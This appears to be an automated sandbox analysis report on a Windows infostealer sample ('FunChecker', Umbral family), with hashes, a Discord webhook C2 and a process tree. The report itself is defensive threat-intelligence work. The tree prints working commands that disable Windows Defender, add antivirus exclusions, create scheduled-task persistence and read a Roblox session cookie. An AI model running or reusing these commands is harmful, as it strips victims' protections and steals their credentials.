Analysis

  • max time kernel
    71s
  • max time network
    69s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-07-2024 21:41

General

  • Target

    FunChecker.vmp.exe

  • Size

    13.6MB

  • MD5

    8b2fa6497ba4fc285a5545bda2e8cde6

  • SHA1

    31cec6fb97888c34c80af8ca73aa67456f68e4e3

  • SHA256

    5197fcb7b98a65eabf8151d847bb394eccd65a184f06a82f674a9b95e62e701c

  • SHA512

    fbf93ca3aecabdbb4a8c978037ca15f14b990fdd32c892e0fdd8bbb491bde8005fbf8326dbd89adf71e9c7cca7f1592dc7ef5694cc45181a50332ed6a594ee40

  • SSDEEP

    393216:jrmibLqxo6IKWmKF8tmZ4O/Qtu1dmoz2jqK8VPYAjV2:jr7b+xHI76tmZ4O4E1d99QAjQ

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263969302936031242/olHrwbuoNh8UxVs0Eh00oYjpj3hs8m4JFfGFTZq-qdru9A_R06a4zPTH8NVHDmX7Crj_

Signatures

  • Detect Umbral payload 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FunChecker.vmp.exe
    "C:\Users\Admin\AppData\Local\Temp\FunChecker.vmp.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1452
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:1552
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
          PID:1120
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          3⤵
            PID:2880
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            3⤵
              PID:1880
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:1924
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:3016
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:5108
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2360
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:4976
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
              3⤵
                PID:4156
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                3⤵
                  PID:3996
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  3⤵
                    PID:3804
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                    3⤵
                      PID:1320
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                      3⤵
                        PID:484
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:200
                        • C:\Windows\system32\schtasks.exe
                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                          3⤵
                            PID:4312
                          • C:\Windows\system32\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                            3⤵
                              PID:4336
                            • C:\Windows\system32\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                              3⤵
                                PID:4072
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                3⤵
                                  PID:808
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                  3⤵
                                    PID:3824
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                    3⤵
                                      PID:392
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                      3⤵
                                        PID:816
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:304
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:3924
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:2652
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                        3⤵
                                          PID:2648
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                          3⤵
                                            PID:2440
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                            3⤵
                                              PID:916
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                              3⤵
                                                PID:1064
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                3⤵
                                                • Modifies security service
                                                PID:512
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
                                              2⤵
                                                PID:4408
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat" "
                                                2⤵
                                                  PID:3256
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
                                                  2⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4316
                                                  • C:\Windows\system32\chcp.com
                                                    chcp 65001
                                                    3⤵
                                                      PID:1512
                                                  • C:\Users\Admin\AppData\Local\Temp\system32.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\system32.exe"
                                                    2⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Drops file in Drivers directory
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Checks whether UAC is enabled
                                                    • Writes to the Master Boot Record (MBR)
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2280
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:424
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1084
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2184
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        4⤵
                                                          PID:816
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4952
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic.exe" os get Caption
                                                        3⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4420
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                        3⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3692
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic.exe" csproduct get uuid
                                                        3⤵
                                                          PID:4980
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          3⤵
                                                            PID:168
                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                            "wmic" path win32_VideoController get name
                                                            3⤵
                                                            • Detects videocard installed
                                                            PID:2320
                                                        • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
                                                          2⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Adds Run key to start application
                                                          • Checks whether UAC is enabled
                                                          • Writes to the Master Boot Record (MBR)
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:848
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1488
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4160
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3596
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:348
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe"
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4212
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "C:\Windows\System32\schtasks.exe" /delete /f /tn "Microsoft OneDrive"
                                                            3⤵
                                                              PID:4896
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp43CA.tmp.bat""
                                                              3⤵
                                                                PID:2880
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout 3
                                                                  4⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:2700
                                                            • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                              2⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Drops startup file
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Adds Run key to start application
                                                              • Checks whether UAC is enabled
                                                              • Writes to the Master Boot Record (MBR)
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:1420
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1696
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1372
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunCheker.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4960
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunCheker.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3292
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunCheker" /tr "C:\Users\Admin\AppData\Roaming\FunCheker.exe"
                                                                3⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:2004
                                                          • C:\Windows\system32\taskmgr.exe
                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                            1⤵
                                                            • Drops file in Windows directory
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SendNotifyMessage
                                                            PID:3824

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\ProgramData\mntemp

                                                            Filesize

                                                            16B

                                                            MD5

                                                            14c709cc22e8c1a80f9d4375234a594b

                                                            SHA1

                                                            960a6ffb980476ae48eae378912f193fd64cecbb

                                                            SHA256

                                                            dc67cf8499ad8b4bbc53649a62b144eea07d3e288de9bd4f2f8fa7b6777ee256

                                                            SHA512

                                                            49637ce4eb4412b5aa8ac94bf29d130ac9d5d8c20554dd559e47a2d1afd9bf13d9d59e7a5ae52d729c4add79cc72b6c03f50c998dcc61eb6c0482d1b9d4bb688

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            1c19c16e21c97ed42d5beabc93391fc5

                                                            SHA1

                                                            8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

                                                            SHA256

                                                            1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

                                                            SHA512

                                                            7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            15b950ccba772df323bf02f69c179a4a

                                                            SHA1

                                                            2eac6eb78f6591c1cf28e21b31b3d34e1bf66b80

                                                            SHA256

                                                            c71903421c0cadf572bfaada11d74da70934b1bea53125ed3dfa98bf9103f2c6

                                                            SHA512

                                                            186b356eab45bc01b49b3d55347fb4fa0c2bcc02e93c370b86fe22894686bfe414f6b26d6a26657e03f2d6ee18ccd7d275aa3dd7477da6d726aa4fb7bf1bb4b4

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            3c3fd361921d8d98b3df837e10640cd2

                                                            SHA1

                                                            b5f055bff09b26217383d67779ae3d35a65f147c

                                                            SHA256

                                                            89b2b05b80cbb6096b9d3720fdf08cc1c3c4303a94dd4c01313f58136860d293

                                                            SHA512

                                                            de8d715492c734f689afbfe4c5abb44fae522de2b254004e495a20316d3ef2e92632a01a61f0fc713d6893d68a328dc018eb078856c3147763e2f1c59041d923

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            13d1bf9d67a18f27c892796ce13274bb

                                                            SHA1

                                                            960d1d9e4254c946d900ce917ee385b07df5d4f0

                                                            SHA256

                                                            57575d5189ecc0b7d2558afda8e3ec332a4dbe59f968ec9cac9e05ad572673b5

                                                            SHA512

                                                            03261e55e81f8c131d498134840ee113a5d6b3e2dd9a43c24f9ecd51cebb251dde5c7aa250f60595d9ee8bb3efb19eca57be05cea9d54bf60595347f6aa3c844

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            ee585d80744fa473d2d9a69a699fb232

                                                            SHA1

                                                            e97b26054ebe227d1f1e86c628603d9512d14324

                                                            SHA256

                                                            da4ed25d0dd128411fa827526ce34f46e3c94aea80e8a5d158379b74761afaeb

                                                            SHA512

                                                            e1bdd533f65137dfb26aea9f9b410d154cb14ec7f9e1b2634ae71d39f1547ce252308a549ef356c99e3ec129bf4a1e4db56a564f47b54fd87f043b68704df35e

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            c7ee3e3ab264210eeed972e54261fd0b

                                                            SHA1

                                                            4a78cc484c205e3f48ba4f64e1d2f69f2be1c367

                                                            SHA256

                                                            8c2789f7c7f22c51fb7ac88c8d3a1efef94ace9331950712e46e755d032c89d6

                                                            SHA512

                                                            3307b06fa7e15f5352d9ae9110f5632a7122fcb1ace56b1e67244a440d9ee3103b523867e0a30f539dd54f9d9d81a0c7c277301db120c7c9d8fa21e1cd192081

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            16KB

                                                            MD5

                                                            cea2b755a6031260f50e84f9d685cdf6

                                                            SHA1

                                                            b1fb5378bc9728ea8334cd36479b20ce1c083446

                                                            SHA256

                                                            abf14e1d8e650426d1bbe086051a5af557a0faa8b9227c3afe3dcfb0b66800bb

                                                            SHA512

                                                            9a8c265b1ffbb242651b881fe17cee472ceb0308afa266d084f363be71473b9c7f6dfcb1b469aec1b087acc8a85909efafd5eca9cf2e4f16f1484a32e01cd402

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            4f045cf9f8b74146a0c4d03e6153df87

                                                            SHA1

                                                            4fa31345ee3b6cb58d19696838d51c4df1f08cc5

                                                            SHA256

                                                            0750c09c05e40cdc609f853c830b498f9876657a9dc4d4c9b493effe10102c1d

                                                            SHA512

                                                            b1ab396901cbcf140cbd5a1225958099d8e0e54e65791cf5d3d449a9eff7029383ccb36858335b74af3703a738761c22b494b3f64e2471f4aae27987df40cce8

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            15KB

                                                            MD5

                                                            e1fb2986a0254069322a051642c3c07e

                                                            SHA1

                                                            3241b8ca231f98ad8399f980e04ec6f2e298ee88

                                                            SHA256

                                                            d7a3123d97222cb8a65f74b5258c2c5296b3d8e453abbe6e583d9c15c56da94d

                                                            SHA512

                                                            e3fbac6f6aa95f83c44fb42a7eebefcf5aa9c542a0c879f0cc988c9e0214a8ab710033c54021258225664ee0e5a5091cb774d6c0058a5b0ec930fb9f21af25e2

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            18KB

                                                            MD5

                                                            c5954e923f139b68cefcc80da9d97b14

                                                            SHA1

                                                            ac6e4c69a18461fd1d4b99865a2eff7b9f902ba3

                                                            SHA256

                                                            58348da39a34547db779f0818aee5d1b146a9ea0432f3fde4e17705b6419f022

                                                            SHA512

                                                            89eb07f533f507e77ab750105184f3326c92eb5cb5a2d36946a855454c1a062d03ad6e068892ae198e836906bfd2be1cc30335ad9a88ad61fae5c6e18542c30b

                                                          • C:\Users\Admin\AppData\Local\Temp\FunChecker.bat

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            42afdea7c75bc9074a22ff1be2787959

                                                            SHA1

                                                            24bc20691a1e99e2cf0b2bca78694701fa47720a

                                                            SHA256

                                                            3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2

                                                            SHA512

                                                            d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

                                                          • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe

                                                            Filesize

                                                            2.1MB

                                                            MD5

                                                            c9805a18753f074961692ba5d93173d9

                                                            SHA1

                                                            3735c69e4a6a85f422b1cd4c6e7c6e1b35a5600b

                                                            SHA256

                                                            9941d87b8bc2fdc1600b82c60d3679a0481f571cd41fe2841cc6058c1eb7d8e6

                                                            SHA512

                                                            84cac01b222fa4357086ed5489759b59a8aac79c02d7706007c9f39eb1cbc3a3765701d64d0fcf1f4eafc6124aff15673fd73177631c60d30101cacd2a8b77b2

                                                          • C:\Users\Admin\AppData\Local\Temp\XClient.exe

                                                            Filesize

                                                            2.2MB

                                                            MD5

                                                            26bd039b1fb29f388adf79135f5ba40e

                                                            SHA1

                                                            d144e02494343f05d84326ac384709d824bf7953

                                                            SHA256

                                                            cc32a9b2888305b8854017914aec48af2e8f35402ce72f95efbd86627d9df466

                                                            SHA512

                                                            5eb35f8df5142471154ea3b7e0cc3df776b576b0818bf4ee5134e4e3edc94608b9c15a6f5131b97ee19f85c55fba6ec15fa5783167074d3778a82156ccb3ab57

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qbxzovob.ff0.ps1

                                                            Filesize

                                                            1B

                                                            MD5

                                                            c4ca4238a0b923820dcc509a6f75849b

                                                            SHA1

                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                            SHA256

                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                            SHA512

                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                          • C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat

                                                            Filesize

                                                            842B

                                                            MD5

                                                            ee877037203d8c16d52690baaecfb371

                                                            SHA1

                                                            3f2401fb6c9bbf85b62deeb082e2ea699a936863

                                                            SHA256

                                                            cbc33d31c79dfe89a693a7c9d63fa546ae7ccc40514bb074c2ab61a16baa45b6

                                                            SHA512

